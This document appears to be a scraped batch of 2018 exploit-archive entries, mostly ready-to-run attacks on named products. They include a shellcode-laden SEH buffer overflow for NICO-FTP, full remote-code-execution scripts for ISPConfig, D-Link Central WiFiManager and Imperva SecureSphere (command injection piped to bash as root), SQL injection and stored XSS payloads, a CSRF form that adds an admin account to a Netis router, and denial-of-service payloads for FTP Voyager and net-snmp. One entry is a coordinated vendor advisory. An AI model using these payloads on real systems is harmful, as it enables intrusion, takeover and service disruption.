# Exploit Title: FTP Voyager 16.2.0 - Denial of Service (PoC)
# Author: Abdullah Alıç
# Discovey Date: 2018-10-2
# Vendor notified : 2018-10-2
# Homepage: https://www.serv-u.com/
# Software Link: https://www.serv-u.com/ftp-voyager
# Tested Version: 16.2.0
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the new file "boom.txt". 
# Start FTP Voyager click "site profiles" >>  New site >> Paste the content into field "IP:" field and hit enter! 
  
#!/usr/bin/python
   
buffer = "A" * 500

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: RICOH MP C1803 JPN Printer - Cross-Site Scripting
# Date: 2018-09-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh.co.jp/mfp/mp_c/1803/
# Software : RICOH Printer
# Product Version:  MP C1803 JPN
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# Affected Products: RICOH MP C1803 JPN, RICOH MP C307
# CVE : CVE-2018-17310, CVE-2018-17313

# On the RICOH MP C1803 JPN printer, HTML Injection and Stored XSS vulnerabilities have 
# been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Target/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Cookie: risessionid=125831398474617; cookieOnOffChecker=on; wimsesid=911065987
Connection: close

mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HireHackking 
# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-04
# Vendor Homepage: https://layerbb.com/
# Software Link: https://demo.layerbb.com/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# POST /search.php HTTP/1.1
# Host: Target

search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search
HireHackking 
# Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
# Date: 2018-10-04
# Platforms: Windows
# Author: Miguel Mendez Z
# Vendor: Nico-FTP
# Version: 3.0.1.19
# Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng]

#!/usr/bin/python

import struct

# Bad Byte: \x0a\x0b\x0c\x0d\x0e\x0f\x5d
happy = (
	"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
	"\x05\x5a\x74\xef\xb8\x30\x52\x31\x53\x8b\xfa\xaf\x75"
	"\xea\xaf\x75\xe7\xff\xe7")
happy += "\x90"*50

shell  = "\x30\x52\x31\x53"*2 # S1R0
shell += "\x90"*8
shell += (
	"\x6a\x30\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
	"\x25\xa8\xbe\x1c\x83\xeb\xfc\xe2\xf4\xd9\x40\x3c\x1c"
	"\x25\xa8\xde\x95\xc0\x99\x7e\x78\xae\xf8\x8e\x97\x77"
	"\xa4\x35\x4e\x31\x23\xcc\x34\x2a\x1f\xf4\x3a\x14\x57"
	"\x12\x20\x44\xd4\xbc\x30\x05\x69\x71\x11\x24\x6f\x5c"
	"\xee\x77\xff\x35\x4e\x35\x23\xf4\x20\xae\xe4\xaf\x64"
	"\xc6\xe0\xbf\xcd\x74\x23\xe7\x3c\x24\x7b\x35\x55\x3d"
	"\x4b\x84\x55\xae\x9c\x35\x1d\xf3\x99\x41\xb0\xe4\x67"
	"\xb3\x1d\xe2\x90\x5e\x69\xd3\xab\xc3\xe4\x1e\xd5\x9a"
	"\x69\xc1\xf0\x35\x44\x01\xa9\x6d\x7a\xae\xa4\xf5\x97"
	"\x7d\xb4\xbf\xcf\xae\xac\x35\x1d\xf5\x21\xfa\x38\x01"
	"\xf3\xe5\x7d\x7c\xf2\xef\xe3\xc5\xf7\xe1\x46\xae\xba"
	"\x55\x91\x78\xc2\xbf\x91\xa0\x1a\xbe\x1c\x25\xf8\xd6"
	"\x2d\xae\xc7\x39\xe3\xf0\x13\x4e\xa9\x87\xfe\xd6\xba"
	"\xb0\x15\x23\xe3\xf0\x94\xb8\x60\x2f\x28\x45\xfc\x50"
	"\xad\x05\x5b\x36\xda\xd1\x76\x25\xfb\x41\xc9\x46\xc9"
	"\xd2\x7f\x25\xa8\xbe\x1c")
shell += "\x90"*30

lol = "ftp.pwnd.com"+" "*50
padding = lol+"\x41"*(4132-(len(shell)+len(happy)+len(lol)))
next_se = "\xEB\x90\x90\x90"
seh_han = struct.pack("<I",0x00422B46) #pop ecx - pop ebp - ret 0x04 -> NicoFtp3.exe
nops = " "*(4881-len(padding))
 
payload = padding+shell+happy+next_se+seh_han+nops

file = open('Sites.conf','w')
file.write('['+payload+']\nHost=\nPort=\nUserName=\nPassword=\nAnonymous=1\nPassive=2\nUseProxy=1\nLocalDir=\nHostDir=\n')
file.close()
HireHackking 
# Title: ISPConfig < 3.1.13 - Remote Command Execution
# Author: 0x09AL 
# Date: 20/08/2018
# Vendor: https://www.ispconfig.org/
# 
# Vulnerability Description
#
# There is an include on almost all the php files, which includes the language template.
# For example:

# In password_reset.php - Line 46 the following code tries to include the filename 
# that is specified in the $_SESSION['s']['language'] variable.
#
# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng';
# 
# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php
# if(preg_match('/[a-z]{2}/',$_POST['language'])) {
#            $_SESSION['s']['user']['language'] = $_POST['language'];
#            $_SESSION['s']['language'] = $_POST['language'];
#        } else {
#            $app->error('Invalid language.');
#        }
# 
# The regex checks if the language contains two lower-case characters.
# The problem is that everything that contains two [a-z] characters will match the regex.
# Developer probably missed the ^ $ on the regex to match the entire file.
#
# Since in the new versions of php we can not use null byte injections, either a path-truncation attack
# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code 
# will get executed as the ispconfig account and not as our chroot-ed account.
#
# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise
# the entire clients.
#
# You need to specify the hostname:port , username, and password of the client.

import requests
import ftplib
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


host = "host:8080"
username = "username"
password = "password"

exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
ftp_username = "randomusr1"
domain = "pwned.com"
site_id = 1
payload_name = "pwned1"
path = ""



def login():
  r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False)
  if(r.text.find("wrong")>0):
    print "[-] Incorrect credentials [-]"
  else:
    print "[+] Logged in Succesfully [+]"


def createSite():
  
  r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  pass

def createFtp():
  global site_id
  r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False)
  print "[+] Getting IDSof the sites [+]"
  temp_array = r.text.split('<option value=')
  nr_sites = len(temp_array)
  print "[+] Number of sites %d [+]" % (int(nr_sites) - 1)
  # Find the latest created site by checking the ID.
  max_id = -9999

  for i in range(1,nr_sites):
    temp = int(temp_array[i].split('>')[0].replace("'",""))
    if(temp > max_id):
      max_id = temp
  site_id = max_id
  print "[+] Newly created site id is : %d [+]" % site_id
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  print "[+] Created FTP Account [+]"
  pass


def uploadPayload():
  ftp = ftplib.FTP(host.split(":")[0])
  ftp.login(username+ftp_username, password)
  ftp.cwd("web")
  ftp.storlines("STOR %s.lng" % payload_name,open("test.txt"))
  print "[+] Payload %s uploaded Succesfully [+]" % payload_name
  pass

def waitTillCreation():
  while 1:
    print "[+] Trying [+]"
    r = exp.get('https://%s/datalogstatus.php' % host,verify=False)
    temp = json.loads(r.text)
    if(temp["count"] == 0):
      print "[+] Everything created .... [+]"
      return
    time.sleep(5)

def getRelativePath():
  
  global path

  r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False)
  path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0]
  path += "/web/" + payload_name
  print "[+] Uploading payload in %s [+]" % path

def triggerVuln():
  r = exp.get('https://%s/tools/user_settings.php' % host,verify=False)
  _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0]
  _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0]
  phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0]
  user_id = r.text.split('name="id" value="')[1].split('"')[0]
  r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False)
  r = exp.get('https://%s/index.php'% host,verify=False)
  print r.text

login()
createSite()
createFtp()
getRelativePath()
waitTillCreation()
uploadPayload()
triggerVuln()
HireHackking 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

D-Link Central WiFiManager Software Controller Multiple Vulnerabilities

1. *Advisory Information*

Title: D-Link Central WiFiManager Software Controller Multiple
Vulnerabilities
Advisory ID: CORE-2018-0010
Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
Date published: 2018-10-04
Date of last update: 2018-10-04
Vendors contacted: D-Link
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
Improper Authorization [CWE-285], Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441

3. *Vulnerability Description*

D-Link's website states that:

[1] Central WiFiManager Software Controller helps network administrators
streamline their wireless access point (AP) management workflow. Central
WiFiManager is an innovative approach to the more traditional
hardware-based multiple access point management system. It uses a
centralized server to both remotely manage and monitor wireless APs on a
network.

Vulnerabilities were found in the Central WiFiManager Software
Controller, allowing unauthenticated and authenticated file upload with
dangerous type that could lead to remote code execution with system
permissions. Also, two stored Cross Site Scripting vulnerabilities were
found.

4. *Vulnerable Packages*

    . Central WifiManager v1.03

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

D-Link released the following Beta version that addresses the reported vulnerabilities:

    . Central WifiManager v 1.03r0100-Beta1

In addition, D-Link published a security note in:
https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092

6. *Credits*

These vulnerabilities were discovered and researched by Julian Muñoz
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

D-Link Central WiFiManager Software Controller exposes an FTP server
that serves by default in port 9000 and has hardcoded credentials
(admin, admin). Taking advantage of this fact, we will upload a PHP file
in the '/web/public' directory and then, by requesting this file, will
be able to execute arbitrary code on the target system (shown in 7.1).

On 7.2 we show a similar attack to but in this case with an
authenticated user in the web application. The application has a
functionality to upload a .rar file used for the captive portal
displayed by the Access Points. We will craft a .rar with a PHP file
that we will end up executing in the context of the web application.
When the .rar is uploaded is stored in the path "\web\captivalportal" in
a folder with a timestamp created by the PHP time() function. In order
to know what is the web server's time we request an information file
that contains the time we are looking for. After we have the server's
time we upload the .rar, calculate the proper epoch and request the
appropriate path increasing this epoch by one until we hit the correct
one.

Finally, we discovered two Cross-Site Scripting, one on the update site
functionality, in the 'sitename' parameter (7.3) and the other one on
the creation of a local user in the 'username' parameter (7.4).

7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of
File with Dangerous Type*

[CVE-2018-17440] The web application starts an FTP server running on the
port 9000 by default with admin/admin credentials and do not show the
option to change it, so in this POC we establish a connection with the
server and upload a PHP file. Since the application do not restrict
unauthenticated users to request any file in the web root, we later
request the uploaded file to achieve remote code execution.

/-----
import requests
from ftplib import FTP

#stablish connection with FTP server
host_ip = "127.0.0.1"
ftp = FTP()
ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000)
ftp.login(<ftp://ftp.login(>"admin", "admin")
data = []

#create PHP poc file
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()

#upload PHP poc file
php_file = open("poc.php", "rb")
ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')>
ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file)
ftp.dir(data.append)<ftp://ftp.dir(data.append)>
ftp.quit()<ftp://ftp.quit()>

for line in data:
  print "-", line

session = requests.Session()
session.trust_env = False

#get the uploaded file for remote code execution
get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)

print get_uploaded_file.text
-----/

7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*

[CVE-2018-17442] In this case we make a file upload using the
functionality given by the onUploadLogPic endpoint, that will take a
.rar file, decompress it and store it in a folder named after the PHP
time() function. Our goal is first obtain the server's time, upload a
.rar with our PHP file, calculate the proper epoch and iterate
increasing it until we hit the proper one and remote code execution is
achieved.

/-----
import re
import time
import requests
import datetime
import tarfile

def parse_to_datetime(date_string):
    date_list = date_string.split("-")
    td = date_list[2][2:].split(":")
    return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))

session = requests.Session()
session.trust_env = False
php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id)
cookie = {'PHPSESSID': php_session_id}

#create tar file to upload.
poc_php_file = open("poc.php", "w+")
poc_php_file.write("<?php\nsystem('whoami');\n?>")
poc_php_file.close()

poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w")
poc_tar_file.add("poc.php")
poc_tar_file.close()

#get server datetime.
get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
                                                  cookies=cookie, verify=False)
date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
#generate epoch from server's date
epoch = int(time.mktime(parse_to_datetime(date).timetuple()))

#upload attack PHP file.
attack_tar_file = "poc_tar_file.tar"
tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')}
restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
                                       files=tar_file,
                                       cookies=cookie, verify=False)

for i in range(0,20):
    #get the uploaded file named after time epoch, returned by PHP time() function.
    filename = str(epoch) + "/" + "poc.php"
    get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False)
    if get_uploaded_file.status_code == 200:
        print "Remote Code Execution Achived"
        print get_uploaded_file.text
        break
    epoch += 1
-----/

7.3. *Cross-Site Scripting in the application site name parameter*

[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
vulnerable to a stored Cross Site Scripting:

The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /index.php/Config/UpdateSite HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/Config/CreatSite
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
-----/

7.4. *Cross-Site Scripting in the creation of a new user*

[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
vulnerable to a stored Cross Site Scripting.

The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /index.php/System/addUser HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/System/userManager
Content-Type: application/x-www-form-urlencoded;
Content-Length: 96
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close

username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
-----/

8. *Report Timeline*

2018-06-04: Core Security sent an initial notification to D-Link,
including a draft advisory.
2018-06-06:D-Link confirmed the reception of the advisory and informed
they will have an initial response on 06/08.
2018-06-08: D-Link informed that they would provide a schedule for the
fixes on 06/13.
2018-06-08: Core Security thanked the update.
2018-06-14: D-Link informed its plan of remediation and notified Core
Security that the fixed version will be available on 08/31.
2018-06-15: Core Security thanked the update and proposed to keep in
regular contact until this tentative release date.
2018-07-23: Core Security requested a status update.
2018-07-25: D-Link answered saying that they are still targeting 08/31
as the release date.
2018-08-24: Core Security requested a new status update and a solidified
release date for the fixed version.
2018-08-28: D-Link sent a beta version for test.
2018-08-30: Core Security tested the beta version and requested D-Link
to coordinate a release date.
2018-09-21: D-Link informed that they were planning a security
announcement and they were ready to schedule a disclosure date.
2018-09-24: Core Security thanked the update and proposed October 4th as
the publication date.
2018-10-04: Advisory CORE-2018-0010 published.

9. *References*

[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com>

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
HireHackking 
# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Discovery Date: 2018-10-01
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
# Tested Version: RTK 2.1.1
# Tested on OS: Kali Linux
# CVE: N/A
 
# Description
# Due to improper session management an attacker is able to add a administrator account
# without providing any authentication credentials.

# PoC 1
POST /form2userconfig.cgi HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# PoC 2
<html>
  <body>
    <form action="http://Target/form2userconfig.cgi" method="POST">
      <input type="hidden" name="username" value="Cakes" />
      <input type="hidden" name="privilege" value="2" />
      <input type="hidden" name="newpass" value="1234" />
      <input type="hidden" name="confpass" value="1234" />
      <input type="hidden" name="adduser" value="Add" />
      <input type="hidden" name="hiddenpass" value="" />
      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 
# Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-10-05
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
# Tested Version: 1.11.8 for php5
# Tested on OS: Kali Linux
# CVE: N/A
 
# Description:
# Improper input validation on the  Calendar / Personal Agenda page allows attackers add a persistent 
# Cross-Site scripting attack to the meeting's content field when adding a new meeting.
# Simply intercept a new meeting request and add in the XSS
 
# PoC

GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
Host: 10.0.0.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
Connection: close
HireHackking 
# Exploit Title: Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-10-06
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
# Tested Version: 1.11.8 for php5
# Tested on OS: Kali Linux
# CVE: N/A
  
# Description:
# Improper input validation on the Firstname and Lastname fields allow attackers to add a persistent 
# Cross-Site scripting attack when registering as a new user
# Simply intercept a new registration request and add in the XSS in the firstname / lastname fields.

# I'm sure there are more exploit vectors on this software. No time to check, had to move along.
  
# PoC

POST /chamillo/main/auth/inscription.php HTTP/1.1
Host: 10.0.0.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.0.0.16/chamillo/main/auth/inscription.php
Cookie: ch_sid=ac092r01e7cnoco62rejshocq4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

status=5&firstname=<script>alert("Cakes");</script>&lastname=<script>alert("Cakes");</script>&email=cakes%40testers.com&username=cakez&pass1=123456&pass2=123456&phone=&language=english&official_code=&extra_skype=&extra_linkedin_url=&submit=&_qf__registration=&item_id=0
HireHackking 
# Exploit Title: net-snmp 5.7.3 - Unauthenticated Denial of Service (PoC)
# Date: 2018-10-08
# Exploit Author: Magnus Klaaborg Stubman 
# Website: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos
# Vendor Homepage: http://www.net-snmp.org/
# Software Link: https://sourceforge.net/projects/net-snmp/files/net-snmp/5.7.3/
# Version: 5.7.3, 5.5.2.1, 5.6.2.1, others not tested

echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/161
HireHackking 
# Title: Imperva SecureSphere 13 - Remote Command Execution
# Author: rsp3ar
# Date: 2018-10-08
# Vendor: https://www.imperva.com/products/securesphere/
# CVE: N/A
# Version: 13.0.10, 13.1.10, 13.2.10
# Tested on: SecureSphere (Virtual Appliance)

# Description
# PWS is a component in SecureSphere v13, which consists of Python CGIs to expose various cli utilities over https.
# The Python CGIs didn't properly sanitize user supplied command parameters, leading to command injection.
# The vulnerability could be exploited in below ways (depending on configuration status of SecureSphere):

# 1. Unauthenticated Remote Code Execution (Pre-FTL mode)
# When SecureSphere VM is provisioned without running 'ftl' utility to configured into SOM/MX/Gateway mode, 
# the vulnerable endpoint could be reached without authentication:

# $ python poc.py -t 192.168.146.201 'sudo id'
# [*] Sending payload to https://192.168.146.201/pws/impcli...
# [*] Received command execution output:
# uid=0(root) gid=0(root) groups=0(root)

# 2. Authenticated Remote Code Execution (Gateway mode)
# When SecureSphere VM is configured as gateway mode via 'ftl' utility, the vulnerable endpoint 
# could be reached with valid agent registration credential for user 'imperva':

# $ python poc.py -t 192.168.146.201 -p 'agent_registration_password' 'sudo id'
# [*] Sending payload to https://192.168.146.201/pws/impcli...
# [*] Received command execution output:
# uid=0(root) gid=0(root) groups=0(root)

#!/usr/bin/env python

import argparse, sys, base64, json
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument("-t", metavar = "target", help = "Target hostname/IP address", type = str, required = True)
parser.add_argument("-p", metavar = "password", help = "Agent registration password for 'imperva' user", type = str, required = False)
parser.add_argument("cmd", help = "Command to be executed on target", type = str)
args = parser.parse_args()

# /pws/inception is another vulnerable endpoint
target_url = "https://%s/pws/impcli" % (args.t)
session = requests.Session()
session.get(target_url, verify = False)

split_mark = "SPLIT_MARK"
payload = "$(printf %s | base64 -d | bash)" % (base64.b64encode(args.cmd))
headers = {}
if args.p is not None:
    headers["Authorization"] = "Basic " + base64.b64encode("imperva:" + args.p)
body = {
    "command": "impctl server status",
    "parameters": {
        "broadcast": True,
        "installer-address": "127.0.0.1 %s%s%s" % (split_mark, payload, split_mark)
    }
}
print("[*] Sending payload to %s..." % (target_url))
response = session.post(target_url,  headers = headers, data = json.dumps(body), verify = False)

if split_mark in response.text:
    print("[*] Received command execution output:")
    print(response.text.split(split_mark)[1])
elif response.status_code == requests.codes.unauthorized:
    print("[!] Gateway Authentication required, please provide agent registration password.")
else:
    print("[!] Failed to execute command on target.")